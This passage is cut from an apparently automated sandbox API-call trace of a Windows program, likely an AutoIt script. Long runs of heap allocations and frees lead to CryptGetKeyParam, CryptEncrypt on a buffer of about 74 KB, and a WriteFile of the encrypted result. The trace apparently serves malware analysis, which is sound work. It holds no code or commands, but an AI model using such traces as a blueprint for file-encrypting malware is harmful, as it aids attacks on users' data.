Flags=0x0, Size=0x8) returned 0x43e28c0 [0113.029] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796e08 [0113.029] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2788 [0113.029] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0113.029] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27b0 [0113.029] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0113.029] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0113.029] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2800 [0113.029] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca958 [0113.029] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0113.029] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0113.029] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2790 [0113.029] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfea0 [0113.029] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa60 [0113.030] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27a0 [0113.030] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796f28 [0113.030] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e27e8 [0113.030] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0113.030] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0113.030] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0113.030] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0113.030] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e27e8 | out: hHeap=0x1780000) returned 1 [0113.030] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f28 | out: hHeap=0x1780000) returned 1 [0113.030] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0113.030] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfea0 | out: hHeap=0x1780000) returned 1 [0113.030] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0113.030] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0113.030] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0113.030] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0113.030] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0113.030] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0113.030] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0113.030] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0113.030] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0113.030] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0113.030] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7f0 | out: hHeap=0x1780000) returned 1 [0113.030] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0113.030] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0113.030] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0113.031] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7c0 | out: hHeap=0x1780000) returned 1 [0113.031] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0113.031] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0113.031] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0113.031] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0113.031] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0113.031] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0113.031] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0113.031] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0113.031] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0113.031] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0113.031] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0113.031] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0113.031] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0113.031] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0113.031] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x1796e88, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0113.031] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0113.031] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0113.031] GetProcAddress (hModule=0x756e0000, lpProcName="CryptGetKeyParam") returned 0x75712db0 [0113.031] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0008 | out: hHeap=0x1780000) returned 1 [0113.031] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0113.031] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0113.031] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0113.031] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0113.031] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0113.031] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0113.032] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe28 | out: hHeap=0x1780000) returned 1 [0113.032] CryptGetKeyParam (in: hKey=0x41ac000, dwParam=0x7, pbData=0x43e2850, pdwDataLen=0x144e008, dwFlags=0x0 | out: pbData=0x43e2850*=0x6610, pdwDataLen=0x144e008*=0x4) returned 1 [0113.032] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0113.032] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0113.032] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0113.032] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0113.032] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0113.032] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0113.032] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7f0 | out: hHeap=0x1780000) returned 1 [0113.032] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0113.032] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0113.032] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7c0 | out: hHeap=0x1780000) returned 1 [0113.032] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0113.032] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0113.032] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7f0 | out: hHeap=0x1780000) returned 1 [0113.032] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0113.032] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0113.032] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0113.032] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0113.032] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7f0 | out: hHeap=0x1780000) returned 1 [0113.032] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0113.032] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0113.032] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0113.032] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0113.032] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0113.032] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cffe0 | out: hHeap=0x1780000) returned 1 [0113.032] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0113.032] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0113.032] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0113.032] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0113.032] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0113.033] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0113.033] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0113.033] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0113.033] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0113.033] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0113.033] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0113.033] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa78 | out: hHeap=0x1780000) returned 1 [0113.033] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0113.033] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0113.033] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0113.033] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0113.033] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0113.033] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2788 | out: hHeap=0x1780000) returned 1 [0113.033] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e08 | out: hHeap=0x1780000) returned 1 [0113.033] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0113.033] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0113.033] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0113.033] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0113.033] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0113.033] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0113.033] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa30 | out: hHeap=0x1780000) returned 1 [0113.033] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90f8 | out: hHeap=0x1780000) returned 1 [0113.033] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0113.033] PeekMessageW (in: lpMsg=0x144e63c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e63c) returned 0 [0113.033] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0113.033] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e97a0 | out: hHeap=0x1780000) returned 1 [0113.033] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0113.033] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0113.033] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7f0 | out: hHeap=0x1780000) returned 1 [0113.034] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0113.034] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9e18 | out: hHeap=0x1780000) returned 1 [0113.034] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0113.034] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0113.034] PeekMessageW (in: lpMsg=0x144e63c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e63c) returned 0 [0113.034] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0113.034] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0113.034] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0113.034] PeekMessageW (in: lpMsg=0x144e63c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e63c) returned 0 [0113.034] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0113.034] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0113.034] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ee8 | out: hHeap=0x1780000) returned 1 [0113.034] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0113.034] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0113.034] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0113.034] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0113.034] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0113.034] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0113.034] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2788 | out: hHeap=0x1780000) returned 1 [0113.034] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e08 | out: hHeap=0x1780000) returned 1 [0113.034] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0113.034] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0113.034] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cffe0 | out: hHeap=0x1780000) returned 1 [0113.034] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0113.034] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac640 | out: hHeap=0x1780000) returned 1 [0113.034] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90b0 | out: hHeap=0x1780000) returned 1 [0113.034] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0113.034] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0113.034] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0113.034] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0113.034] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0113.034] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2ae8 | out: hHeap=0x1780000) returned 1 [0113.035] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797128 | out: hHeap=0x1780000) returned 1 [0113.035] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0113.035] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0113.035] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0113.035] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0113.036] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0113.036] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0113.036] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43ca7f0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0113.036] CryptEncrypt (in: hKey=0x41ac000, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x144e538*=0x12464, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x144e538*=0x12470) returned 1 [0113.036] CharLowerBuffW (in: lpsz="byte[74865]", cchLength=0xb | out: lpsz="byte[74865]") returned 0xb [0113.038] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0113.038] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0113.038] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0113.038] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43caca0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0113.038] CryptEncrypt (in: hKey=0x41ac000, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x49ac478*, pdwDataLen=0x144e538*=0x12464, dwBufLen=0x12470 | out: pbData=0x49ac478*, pdwDataLen=0x144e538*=0x12470) returned 1 [0113.038] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0113.038] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0113.038] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0113.039] WriteFile (in: hFile=0x258, lpBuffer=0x4528488*, nNumberOfBytesToWrite=0x12470, lpNumberOfBytesWritten=0x144ef3c, lpOverlapped=0x0 | out: lpBuffer=0x4528488*, lpNumberOfBytesWritten=0x144ef3c*=0x12470, lpOverlapped=0x0) returned 1 [0113.041] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0113.041] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0113.041] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0113.041] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0113.041] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x43ca928, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0113.041] CryptDestroyKey (hKey=0x41ac000) returned 1 [0113.041] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0113.041] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0113.041] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0113.100] TranslateMessage (lpMsg=0x144eb0c) returned 0 [0113.100] DispatchMessageW (lpMsg=0x144eb0c) returned 0x0 [0113.100] KillTimer (hWnd=0x502d2, uIDEvent=0x1) returned 1 [0113.100] SetTimer (hWnd=0x502d2, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0113.100] PeekMessageW (in: lpMsg=0x144eb0c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb0c) returned 0 [0113.100] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2880 [0113.100] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2740 [0113.100] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27e0 [0113.100] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e88 [0113.100] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2840 [0113.100] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac6c0 [0113.101] PeekMessageW (in: lpMsg=0x144ed64, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ed64) returned 0 [0113.101] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2780 [0113.101] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0113.101] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac6c0 | out: hHeap=0x1780000) returned 1 [0113.101] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f48 | out: hHeap=0x1780000) returned 1 [0113.101] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0113.101] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0120 | out: hHeap=0x1780000) returned 1 [0113.101] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0113.101] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff68 | out: hHeap=0x1780000) returned 1 [0113.101] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0113.101] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfef0 | out: hHeap=0x1780000) returned 1 [0113.101] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0113.101] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0148 | out: hHeap=0x1780000) returned 1 [0113.101] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca748 | out: hHeap=0x1780000) returned 1 [0113.101] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca508 | out: hHeap=0x1780000) returned 1 [0113.101] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0113.101] HeapFree (in: 